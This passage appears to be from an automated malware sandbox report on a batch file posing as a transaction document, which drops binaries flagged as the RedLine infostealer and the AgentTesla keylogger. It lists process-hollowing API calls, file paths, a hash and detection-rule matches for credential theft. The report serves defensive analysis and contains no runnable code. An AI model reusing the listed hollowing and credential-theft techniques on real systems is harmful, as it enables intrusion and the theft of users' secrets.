                  Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000011.00000001.1996288631.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: z1Transaction_ID_REF2418_cmd.batStatic file information: 1139107
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D8670 NtUnmapViewOfSection,3_2_031D8670
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D8400 NtReadVirtualMemory,3_2_031D8400
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D7A2C NtAllocateVirtualMemory,3_2_031D7A2C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D7D78 NtWriteVirtualMemory,3_2_031D7D78
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,3_2_031D8D70
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,3_2_031DDD70
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,3_2_031DDC04
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,3_2_031DDC8C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,3_2_031DDBB0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D7A2A NtAllocateVirtualMemory,3_2_031D7A2A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,3_2_031D8D6E
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B8670 NtUnmapViewOfSection,10_2_031B8670
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B8400 NtReadVirtualMemory,10_2_031B8400
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B7A2C NtAllocateVirtualMemory,10_2_031B7A2C
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B7D78 NtWriteVirtualMemory,10_2_031B7D78
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,10_2_031B8D70
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031BDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,10_2_031BDD70
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B86F7 NtUnmapViewOfSection,10_2_031B86F7
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031BDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_031BDBB0
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B7A2A NtAllocateVirtualMemory,10_2_031B7A2A
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B7AC9 NtAllocateVirtualMemory,10_2_031B7AC9
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031B8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,10_2_031B8D6E
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031BDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_031BDC04
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031BDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,10_2_031BDC8C
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A8670 NtUnmapViewOfSection,16_2_031A8670
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A8400 NtReadVirtualMemory,16_2_031A8400
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A7A2C NtAllocateVirtualMemory,16_2_031A7A2C
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A7D78 NtWriteVirtualMemory,16_2_031A7D78
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,16_2_031A8D70
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031ADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,16_2_031ADD70
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A86F7 NtUnmapViewOfSection,16_2_031A86F7
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031ADBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,16_2_031ADBB0
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A7A2A NtAllocateVirtualMemory,16_2_031A7A2A
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A7AC9 NtAllocateVirtualMemory,16_2_031A7AC9
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031A8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,16_2_031A8D6E
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031ADC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,16_2_031ADC04
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031ADC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,16_2_031ADC8C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D8788 CreateProcessAsUserW,3_2_031D8788
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031C20C43_2_031C20C4
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00408C609_2_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_0040DC119_2_0040DC11
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00407C3F9_2_00407C3F
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00418CCC9_2_00418CCC
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00406CA09_2_00406CA0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004028B09_2_004028B0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_0041A4BE9_2_0041A4BE
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00408C609_2_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004182449_2_00418244
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004016509_2_00401650
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00402F209_2_00402F20
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004193C49_2_004193C4
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004187889_2_00418788
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00402F899_2_00402F89
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_00402B909_2_00402B90
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004073A09_2_004073A0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_27F6DA509_2_27F6DA50
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_27F6CE389_2_27F6CE38
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_27F60FD09_2_27F60FD0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_27F6D1809_2_27F6D180
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_27F610309_2_27F61030
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D1867489_2_2D186748
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D18CFC89_2_2D18CFC8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D1899C09_2_2D1899C0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D1800409_2_2D180040
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D18F2789_2_2D18F278
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D18F9D29_2_2D18F9D2
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D1800079_2_2D180007
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D18C0E89_2_2D18C0E8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D8157B79_2_2D8157B7
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D8109D09_2_2D8109D0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D81A8A29_2_2D81A8A2
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D81DE389_2_2D81DE38
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2D811AC89_2_2D811AC8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2DB81C609_2_2DB81C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2DB8E7209_2_2DB8E720
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2DB81C579_2_2DB81C57
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_2DEC45719_2_2DEC4571
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00408C609_1_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_0040DC119_1_0040DC11
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00407C3F9_1_00407C3F
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00418CCC9_1_00418CCC
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00406CA09_1_00406CA0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004028B09_1_004028B0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_0041A4BE9_1_0041A4BE
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00408C609_1_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004182449_1_00418244
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004016509_1_00401650
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00402F209_1_00402F20
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004193C49_1_004193C4
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004187889_1_00418788
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00402F899_1_00402F89
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_00402B909_1_00402B90
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_1_004073A09_1_004073A0
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031A20C410_2_031A20C4
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031AC98E10_2_031AC98E
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 10_2_031AC9DE10_2_031AC9DE
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00408C6011_2_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_0040DC1111_2_0040DC11
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00407C3F11_2_00407C3F
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00418CCC11_2_00418CCC
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00406CA011_2_00406CA0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_004028B011_2_004028B0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_0041A4BE11_2_0041A4BE
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00408C6011_2_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_0041824411_2_00418244
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_0040165011_2_00401650
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00402F2011_2_00402F20
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_004193C411_2_004193C4
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_0041878811_2_00418788
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00402F8911_2_00402F89
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_00402B9011_2_00402B90
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_004073A011_2_004073A0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_24F1DCE811_2_24F1DCE8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_24F1D0D011_2_24F1D0D0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_24F1103011_2_24F11030
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_24F1D41811_2_24F1D418
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_24F10FD011_2_24F10FD0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2A49004011_2_2A490040
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2A4999A011_2_2A4999A0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2A49672811_2_2A496728
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2A49CFA811_2_2A49CFA8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2A49002F11_2_2A49002F
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AB1A8CF11_2_2AB1A8CF
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AB107C011_2_2AB107C0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AB155A711_2_2AB155A7
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AB118B811_2_2AB118B8
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AB1DD8811_2_2AB1DD88
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AFE0C3011_2_2AFE0C30
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_2_2AFEE86011_2_2AFEE860
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00408C6011_1_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_0040DC1111_1_0040DC11
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00407C3F11_1_00407C3F
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00418CCC11_1_00418CCC
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00406CA011_1_00406CA0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_004028B011_1_004028B0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_0041A4BE11_1_0041A4BE
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00408C6011_1_00408C60
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_0041824411_1_00418244
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_0040165011_1_00401650
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00402F2011_1_00402F20
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_004193C411_1_004193C4
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_0041878811_1_00418788
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00402F8911_1_00402F89
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_00402B9011_1_00402B90
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 11_1_004073A011_1_004073A0
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 13_2_004057B813_2_004057B8
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_031920C416_2_031920C4
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_0319C98F16_2_0319C98F
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: 16_2_0319C9DF16_2_0319C9DF
                  Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\xrbjyllC.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: String function: 0040A6C4 appears 68 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 031C46D4 appears 244 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 031D89D0 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 031D894C appears 56 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 031C4500 appears 33 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 031C4860 appears 949 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 031C44DC appears 74 times
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: String function: 031A894C appears 50 times
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: String function: 031946D4 appears 155 times
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: String function: 03194860 appears 683 times
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: String function: 031A46D4 appears 155 times
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: String function: 031A4860 appears 683 times
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFCode function: String function: 031B894C appears 50 times
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: String function: 0040D606 appears 96 times
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: String function: 0040E1D8 appears 172 times
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: String function: 0040FB9C appears 40 times
                  Source: 9.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 17.1.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
